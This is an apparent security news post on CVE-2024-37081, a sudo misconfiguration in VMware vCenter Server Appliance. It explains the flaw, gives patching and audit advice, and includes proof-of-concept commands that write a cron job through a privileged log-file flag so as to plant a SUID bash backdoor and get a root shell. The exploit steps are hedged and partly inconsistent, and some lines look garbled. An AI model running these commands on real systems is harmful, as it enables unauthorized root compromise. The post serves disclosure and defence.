CVE CyberSecurity Database News

CVE-2024-37081 - Exploiting vCenter Server Sudo Misconfigurations for Local Privilege Escalation

Poster -

In June 2024, VMware disclosed CVE-2024-37081, a set of local privilege escalation (LPE) vulnerabilities impacting vCenter Server Appliance (VCSA). The root cause: misconfigured sudo permissions allow regular users to run privileged commands, leading to potential root compromise. This exclusive post walks through the details, provides PoC code, and links to crucial references.

> Warning: This post is for educational purposes. Do not exploit systems you don’t own or have explicit permission to test.

From the official VMware advisory

> “Multiple local privilege escalation vulnerabilities in vCenter Server arise out of misconfigurations of sudo.”

7. before 7.U3r

Note: Only users with shell access to VCSA (e.g., through SSH) and a legitimate (non-root) account are in scope.

Vulnerability in Depth

The vulnerability stems from sudo rules that are too broad or grant dangerous access to non-admin users.

Suppose /etc/sudoers.d/vmware has entries like

%vmonuser ALL=(ALL) NOPASSWD: /usr/bin/vmon-cli *

Here, any user in the vmonuser group can run vmon-cli with *any arguments* as root — no password.

Some commands (e.g., vmon-cli --log-file /etc/shadow ...) could allow arbitrary file reads or writes, depending how the tool is written.

This expands the attack surface: if an attacker can chain this to write or append to files or execute shell commands, it can lead to root access.

Login as a restricted user on the VCSA and run

sudo -l

Sample Output

User testuser may run the following commands on this host:
    (root) NOPASSWD: /usr/bin/vmon-cli *

2. Abuse Privileged Command

Try to use vmon-cli to overwrite root-privileged files or trick it into running a shell or script as root. For example, some internal tools allow specifying log file or config file paths.

#### Example: Overwrite /etc/cron.d/rootbackdoor

Suppose you can do the following

sudo /usr/bin/vmon-cli --log-file /etc/cron.d/rootbackdoor start

Contents for /etc/cron.d/rootbackdoor

* * * * * root /bin/bash -c "cp /bin/bash /tmp/bashroot; chmod +s /tmp/bashroot"

After a minute, you can spawn a root shell

/tmp/bashroot -p
whoami   # root

> Note: The exact exploit depends on the (undocumented) flags and behaviors of the whitelisted binaries.

Here’s a generic *PoC* exploiting a forced log file path (if available)

echo '* * * * * root echo "rooted" > /tmp/pwned' > /tmp/evilcron
sudo /usr/bin/vmon-cli --log-file /etc/cron.d/evilcron start

After a minute

cat /tmp/pwned
# Output: rooted

Patch Immediately:

Follow VMSA-2024-0012 and update your systems.

Audit Sudoers:

Check /etc/sudoers and /etc/sudoers.d/* for dangerous rules.

Limit Shell Access:

Restrict shell/SSH to only trusted personnel or jump servers.

Official References

- VMware Security Advisory VMSA-2024-0012
- NIST CVE Record
- CVE Mitre

Conclusion

CVE-2024-37081 is a serious vulnerability—if an attacker gets local access to your VCSA, getting root is straightforward with the misconfigured sudo rules. Always patch on time, review privileged command configurations, and harden access to critical systems. Attackers target privileged escalation as the next stage after an initial foothold—don’t give them an easy path.

Timeline

Published on: 06/18/2024 06:15:11 UTC
Last modified on: 08/02/2024 03:43:50 UTC